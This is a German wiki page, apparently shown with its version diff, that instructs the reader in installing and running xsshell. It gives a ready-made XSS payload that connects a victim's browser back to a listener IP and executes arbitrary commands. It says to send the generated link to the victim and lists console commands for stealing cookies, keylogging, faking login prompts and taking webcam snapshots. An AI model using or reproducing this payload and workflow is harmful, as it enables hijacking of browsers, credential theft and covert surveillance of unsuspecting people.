Version vom 28. Juli 2021, 12:58 Uhr

git clone

sudo apt-get install go
go get github.com/raz-varren/xsshell
go install github.com/raz-varren/xsshell

start

./xsshell -host 127.0.0.1 -port 4444

xsshell -h Usage of xsshell:

 -cert string
   	ssl cert file
 -host string
   	websocket listen address
 -key string
   	ssl key file
 -log string
   	specify a log file to log all console communication
 -path string
   	websocket connection path (default "/s")
 -port string
   	websocket listen port (default "8234")
 -servdir string
   	specify a directory to serve files from. a file server will not be started if no directory is specified
 -servpath string
   	specify the base url path that you want to serve files from (default "/static/")
 -wrkdir string
   working directory that will be used as the relative root path for any commands requiring user provided file paths

Payload

Payload muss ins Eingabefeld
Generierter Link wird zum Opfer geschickt

JS Script : <script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://10.82.70.52:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>

Die Shell

start socket: 1, header: AqHFTtA

socket connected: 1

   user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 
   page url:   http://127.0.0.1/xss.php?msg=?

   referrer:   http://127.0.0.1/xss.php?msg=?
   cookies:

xsshell

listening for sockets on :port, at url path: /s
starting console
type \? to list available commands

xsshell > \?
xsshell > \help \? \h: list available commands
xsshell > \alert: send an alert message to the target set usage: \alert ALERT_MESSAGE
xsshell > \cs: get the current cookies from the target set's current page and any cookie updates.
xsshell > \ct: crash the target set's tab
xsshell > \emd: return a list of media devices accessible to the target set's browser
xsshell > \ex: print out the client exploit javascript
xsshell > \exm: print out the minified version of the client exploit javascript
xsshell > \gi: download all images on the target set's page.

xsshell > \kl: start a keylogger on the target set
xsshell > \ll: list out any links found on the target set's currently open page
xsshell > \pfl: open a modal on the target set's page prompting them for a username and password
xsshell > \ps: print out socket info for all actively connected websockets
xsshell > \q: exit this program
xsshell > \sf: send a javascript file to the target set and execute it.

xsshell > \sfl: resend the last file that was sent using \sf, includes any new changes to the file
xsshell > \src: get the target set's currently rendered page source
xsshell > \st: set the websockets to target. one or more targets can be set with the following methods:
xsshell > * -targets all active websocket connections (default target set)
xsshell > 8 -target a single websocket connection belonging to that id number
xsshell > 1,2,8,10 -targets all websocket IDs in the comma separated list

xsshell > \wcs: attempt to take a snapshot from the target set's webcam, if one is available.
xsshell > images will be stored in DOWNLOAD_DIR.

xsshell > \xhr: send an xhr request from the target set's current page
xsshell > usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY]

Links

https://github.com/shelld3v/JSshell/blob/master/README.md

@@ Zeile 44: / Zeile 44: @@
      referrer:   http://127.0.0.1/xss.php?msg=?
      cookies:
-xsshell
+====== xsshell ======
-# listening for sockets on :8234, at url path: /s
+# listening for sockets on :port, at url path: /s
 # starting console
 # type \? to list available commands
-# xsshell >
 # xsshell > \?
 # xsshell > \help \? \h: list available commands
-# xsshell > \alert:      send an alert message to the target set
+# xsshell > \alert:      send an alert message to the target set  usage: \alert ALERT_MESSAGE
-# xsshell >                  usage: \alert ALERT_MESSAGE
 # xsshell > \cs:         get the current cookies from the target set's current page and any cookie updates.
 # xsshell > \ct:         crash the target set's tab
@@ Zeile 58: / Zeile 57: @@
 # xsshell > \ex:         print out the client exploit javascript
 # xsshell > \exm:        print out the minified version of the client exploit javascript
 # xsshell > \gi:         download all images on the target set's page.
-# xsshell >              images will be stored in DOWNLOAD_DIR.
-# xsshell >              relative file paths are relative to the path provided to -wrkdir
-# xsshell >                  usage: \gi [DOWNLOAD_DIR]
-# xsshell >                  examples:
-# xsshell >                      \gi
-# xsshell >                      \gi /tmp/images
-# xsshell >                      \gi imgdir
 # xsshell > \kl:         start a keylogger on the target set
 # xsshell > \ll:         list out any links found on the target set's currently open page
@@ Zeile 72: / Zeile 65: @@
 # xsshell > \q:          exit this program
 # xsshell > \sf:         send a javascript file to the target set and execute it.
-# xsshell >              any data can be returned from the target set by calling `this.send(\"return data string\");` in the script.
-# xsshell >              relative file paths are relative to the path provided to -wrkdir
-# xsshell >                  usage: \sf FILE_PATH
 # xsshell > \sfl:        resend the last file that was sent using \sf, includes any new changes to the file
 # xsshell > \src:        get the target set's currently rendered page source
@@ Zeile 81: / Zeile 72: @@
 # xsshell >              8        -target a single websocket connection belonging to that id number
 # xsshell >              1,2,8,10 -targets all websocket IDs in the comma separated list
-# xsshell >              4-16     -targets all websocket IDs from the lowest number listed to the highest number listed
-# xsshell >              4-       -targets all websocket IDs that are greater than or equal to the listed number
-# xsshell >              -16      -targets all websocket IDs that are less than or equal to the listed number
-# xsshell >                  usage: \st TARGET_SET
-# xsshell >                  examples:
-# xsshell >                      \st *
-# xsshell >                      \st 2
-# xsshell >                      \st 2,4,7
-# xsshell >                      \st 10-15
-# xsshell >                      \st 6-
-# xsshell >                      \st -100
 # xsshell > \wcs:        attempt to take a snapshot from the target set's webcam, if one is available.
 # xsshell >              images will be stored in DOWNLOAD_DIR.
-# xsshell >              relative file paths are relative to the path provided to -wrkdir.
-# xsshell >              NOTE: using this command may prompt the target set for webcam access.
-# xsshell >              the target set may reject the prompt, or ignore it entirely.
-# xsshell >                  usage: \ws [DOWNLOAD_DIR]
-# xsshell >                  examples:
-# xsshell >                      \wcs /tmp/webcam_snaps
-# xsshell >                      \wcs snaps
 # xsshell > \xhr:        send an xhr request from the target set's current page
 # xsshell >                  usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY]
-# xsshell >                  examples:
-# xsshell >                      \xhr GET https://google.com/
-# xsshell >                      \xhr POST https://google.com/ application/json {"hello": "world"}
-# xsshell >
 =Links=
 *https://github.com/shelld3v/JSshell/blob/master/README.md

Xsshell: Unterschied zwischen den Versionen